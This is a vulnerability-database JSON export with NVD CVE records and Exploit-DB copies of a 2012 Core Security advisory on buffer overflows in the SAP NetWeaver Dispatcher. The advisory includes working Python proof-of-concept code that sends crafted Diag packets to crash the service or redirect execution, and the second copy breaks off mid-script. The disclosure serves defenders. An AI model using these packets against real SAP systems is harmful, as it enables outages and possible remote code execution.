["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1516"], "modified": "2018-10-09T19:31:00", "cpe": ["cpe:/o:apple:mac_os_x:10.7.0", "cpe:/o:apple:mac_os_x:10.6.1", "cpe:/o:apple:mac_os_x:10.6.4", "cpe:/o:apple:mac_os_x:10.6.5", "cpe:/o:apple:mac_os_x:10.6.7", "cpe:/o:apple:mac_os_x:10.5.0", "cpe:/o:apple:mac_os_x:10.5.1", "cpe:/o:apple:mac_os_x:10.5.7", "cpe:/o:apple:mac_os_x:10.5.4", "cpe:/o:apple:mac_os_x:10.5.5", "cpe:/o:apple:mac_os_x:10.5.3", "cpe:/o:apple:mac_os_x:10.6.8", "cpe:/o:apple:mac_os_x:10.6.2", "cpe:/o:apple:mac_os_x:10.7.1", "cpe:/o:apple:mac_os_x:10.6.6", "cpe:/o:apple:mac_os_x:10.6.0", "cpe:/o:apple:mac_os_x:10.6.3", "cpe:/o:apple:mac_os_x:10.7.2", "cpe:/o:apple:mac_os_x:10.5.6", "cpe:/o:apple:mac_os_x:10.5.2", "cpe:/o:apple:mac_os_x:10.5.8"], "id": "CVE-2011-1516", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1516", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.8:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.6.8:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:06:04", "description": "The Diaginput function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", "edition": 3, "cvss3": {}, "published": "2012-05-15T04:21:00", "title": "CVE-2012-2513", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2513"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2012-2513", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2513", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-05T23:15:00", "title": "CVE-2011-1517", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1517"], "modified": "2020-02-07T19:09:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2011-1517", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1517", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:06:04", "description": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", "edition": 3, "cvss3": {}, "published": "2012-05-15T04:21:00", "title": "CVE-2012-2511", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2511"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2012-2511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2511", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T10:34:00", "description": "SAP Netweaver Dispatcher Multiple Vulnerabilities. CVE-2011-1516,CVE-2012-2511,CVE-2012-2512,CVE-2012-2513,CVE-2012-2514,CVE-2012-2611,CVE-2012-2612. Dos exp...", "published": "2012-05-09T00:00:00", "type": "exploitdb", "title": "SAP Netweaver Dispatcher Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2012-2611", "CVE-2012-2514", "CVE-2012-2612", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-05-09T00:00:00", "id": "EDB-ID:18853", "href": "https://www.exploit-db.com/exploits/18853/", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nSAP Netweaver Dispatcher Multiple Vulnerabilities\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-08\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\r\nCVE-2012-2513, CVE-2012-2514\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nSAP Netweaver [1] is a technology platform for building and integrating\r\nSAP business applications. Multiple vulnerabilities have been found in\r\nSAP Netweaver that could allow an unauthenticated, remote attacker to\r\nexecute arbitrary code and lead to denial of service conditions. The\r\nvulnerabilities are triggered sending specially crafted SAP Diag packets\r\nto remote TCP port 32NN (being NN the SAP system number) of a host\r\nrunning the \"Dispatcher\" service, part of SAP Netweaver Application\r\nServer ABAP. By sending different messages, the different\r\nvulnerabilities can be triggered.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\n . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\n . Older versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Vendor did not provide this information.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nSAP released the security note\r\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\r\nissues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of\r\nthe vulnerabilities:\r\n\r\n 1. Disable work processes' Developer Traces for the 'Dialog\r\nProcessing' component (for the vulnerabilities [CVE-2011-1516],\r\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).\r\n 2. Restrict access to the Dispatcher service's TCP ports (3200/3299)\r\n(for all vulnerabilities).\r\n 3. Restrict access to the work process management transactions\r\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\r\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\r\n[CVE-2012-2512]).\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Martin Gallo\r\nfrom\r\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services.\r\nThe publication of this advisory was coordinated by Fernando Miranda\r\nfrom http://www.coresecurity.com/content/corelabs-advisories .\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in\r\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\r\nand [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities\r\ndescribed below:\r\n\r\n/-----\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\r\ndefault=\"localhost\")\r\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\r\nnumber\", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n packet = struct.pack(\"!I\", len(packet)) + packet\r\n sock.send(packet)\r\n\r\ndef receive(sock):\r\n length = sock.recv(4)\r\n (length, ) = struct.unpack(\"!I\", length)\r\n data = \"\"\r\n while len(data)<length:\r\n data+= sock.recv(length)\r\n return (length, data)\r\n\r\ndef initialize(sock):\r\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n user_connect =\r\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\r\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\r\n support_data+=\r\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\r\n support_data+=\r\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n dpheader =\r\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\r\nsupport_data))\r\n dpheader+=\r\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\r\n dpheader+= \"terminalXXXXXXX\"\r\n dpheader+=\r\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \r\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\r\n eom = \"\\x0c\"\r\n send_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, options.port))\r\ninitialize(connection)\r\nreceive(connection) \r\n\r\n-----/\r\n In the following subsections, we give the python code that can be added\r\nafter the script above in order to reproduce all vulnerabilities.\r\n\r\n\r\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\r\n\r\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\r\n'disp+work.exe' module process a specially crafted network packet.\r\nMalicious packets are processed by the vulnerable function\r\n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace\r\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\r\nthe \"Dialog\" work process handling the packet [2]. This vulnerability\r\ncould allow a remote unauthenticated attacker to execute arbitrary code\r\nwith the privileges of the user running the \"Dispatcher\" service. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\r\ncrash+= \"Y\"*32\r\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\r\n\r\n[CVE-2011-1517] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a\r\nremote unauthenticated attacker to conduct a denial of service attack\r\nagainst the vulnerable systems. The following python code can be used to\r\ntrigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2511] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceAtoms'. This vulnerability could allow a remote\r\nunauthenticated attacker to conduct a denial of service attack. The\r\nfollowing python code can be used to trigger the vulnerability:\r\n\r\n/-----\r\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2512] The vulnerability can be triggered by sending a\r\nspecially crafted network packet to the vulnerable function\r\n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to\r\nconduct a denial of service attack.\r\n\r\n/-----\r\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\r\nfunction 'Diaginput', allowing a denial of service attack against the\r\nvulnerable systems.\r\n\r\n/-----\r\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\r\n\r\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\r\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\r\nvulnerability could allow a remote unauthenticated attacker to conduct a\r\ndenial of service attack.\r\n\r\n/-----\r\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\r\nsend_message(connection, crash)\r\n-----/\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2012-01-24:\r\nCore Security Technologies notifies the SAP team of the vulnerability,\r\nsetting the estimated publication date of the advisory for February\r\n21st, 2012.\r\n\r\n. 2012-01-24:\r\nCore sends an advisory draft with technical details.\r\n\r\n. 2012-01-24:\r\nThe SAP team confirms the reception of the issue and asks to use the\r\nsecurity ID 582820-2012 for further communication. SAP also notifies its\r\nterms and conditions [3], and asks for Core to commit to that guideline.\r\n\r\n. 2012-02-01:\r\nThe Core Advisories Team communicates that it has its own guidelines for\r\nthe advisories publication process, which may conflict with SAP's\r\nguidelines. In particular, Core does not guarantee that the publication\r\nof the advisory will be postponed until a fix or patch is made available\r\nby SAP. If information about this vulnerability is partially or\r\ncompletely leaked by a third party, the advisory would be released\r\nimmediately as forced release. Despite this, the Core team commits to\r\ncomply with SAP's guidelines as much as possible.\r\n\r\n. 2012-02-21:\r\nFirst release date missed.\r\n\r\n. 2012-02-22:\r\nCore asks for the status of the fix and notifies that the release date\r\nwas missed.\r\n\r\n. 2012-02-23:\r\nSAP notifies that, because the development team has to downport the\r\nsolutions for a huge bunch of software releases, the earliest release\r\ndate for the patches would be May 8th 2012.\r\n\r\n. 2012-02-23:\r\nCore re-schedules the advisory publication to May 8th.\r\n\r\n. 2012-04-16:\r\nCore asks if the patching process is still on track to release patches\r\non May 8th and requests a status of the fix.\r\n\r\n. 2012-04-16:\r\nVendor notifies that the release date is still planned for May 8th, but\r\ndue to quality control processes this date cannot be guaranteed.\r\n\r\n. 2012-05-04:\r\nCore notifies that everything is ready for publication and requests the\r\nvendor to confirm the release date and the list of affected platforms\r\n(no reply received).\r\n\r\n. 2012-05-07:\r\nCore asks again for the status of the fix.\r\n\r\n. 2012-05-08:\r\nSAP notifies that they have released the security note 1687910 [4] on\r\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\r\nalso requests Core to remove all the technical information researched by\r\nMartin Gallo in [Sec. 8].\r\n\r\n. 2012-05-08:\r\nCore replies that the reporting of vulnerabilities is aimed at helping\r\nvulnerable users to understand and address the issues; the advisory will\r\nthus be released with the technical information.\r\n\r\n. 2012-05-08:\r\nAdvisory CORE-2012-0123 published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] http://www.sap.com/platform/netweaver/index.epx\r\n[2]\r\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\r\n[3] SAP's legal information, terms and conditions\r\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\r\n\r\n[4] SAP security note 1687910\r\nhttps://service.sap.com/sap/support/notes/1687910.\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2012 Core Security\r\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18853/"}, {"lastseen": "2016-02-02T14:49:48", "description": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities. CVE-2012-2511,CVE-2012-2512,CVE-2012-2513,CVE-2012-2514,CVE-2012-2611,CVE-2012-2612. Dos expl...", "published": "2012-08-21T00:00:00", "type": "exploitdb", "title": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2611", "CVE-2012-2514", "CVE-2012-2612", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-08-21T00:00:00", "id": "EDB-ID:20705", "href": "https://www.exploit-db.com/exploits/20705/", "sourceData": "1. Advisory Information\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-10\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n2. Vulnerability Information\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514\r\n\r\n3. Vulnerability Description\r\nSAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the \"Dispatcher\" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.\r\n\r\n4. Vulnerable packages\r\nSAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\r\nSAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\r\nOlder versions are probably affected too, but they were not checked.\r\n5. Non-vulnerable packages\r\nVendor did not provide this information.\r\n6. Vendor Information, Solutions and Workarounds\r\nSAP released the security note 1687910 regarding these issues. Contact SAP for further information.\r\n\r\nMartin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:\r\n\r\nDisable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\nRestrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).\r\nRestrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n7. Credits\r\nThese vulnerabilities were discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Security Advisories Team .\r\n\r\n8. Technical Description / Proof of Concept Code\r\nNOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\r\n\r\nThe following python script can be used to reproduce the vulnerabilities described below:\r\n\r\nimport socket, struct\r\nfrom optparse import OptionParser\r\n\r\n# Parse the target options\r\nparser = OptionParser()\r\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\", default=\"localhost\")\r\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port number\", default=3200)\r\n(options, args) = parser.parse_args()\r\n\r\ndef send_packet(sock, packet):\r\n\tpacket = struct.pack(\"!I\", len(packet)) + packet\r\n\tsock.send(packet)\r\n\r\ndef receive(sock):\r\n\tlength = sock.recv(4)\r\n\t(length, ) = struct.unpack(\"!I\", length)\r\n\tdata = \"\"\r\n\twhile len(data)<length:\r\n\t\tdata+= sock.recv(length)\r\n\treturn (length, data)\r\n\r\ndef initialize(sock):\r\n\tdiagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tuser_connect = \"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\r\n\tsupport_data = \"\\x10\\x04\\x0b\\x00\\x20\"\r\n\tsupport_data+= \"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\r\n\tsupport_data+= \"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tdpheader = \"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\tdpheader+= struct.pack(\"I\", len(diagheader + user_connect + support_data))\r\n\tdpheader+= \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n\tdpheader+= \"terminalXXXXXXX\"\r\n\tdpheader+= \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tsend_packet(sock, dpheader + diagheader + user_connect + support_data)\r\n\r\ndef send_message(sock, message):\r\n\tdiagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\tstep = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\r\n\teom = \"\\x0c\"\r\n\tsend_packet(sock, diagheader + step + message + eom)\r\n\r\n# Connect and send initialization packet\r\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnection.connect((options.hostname, 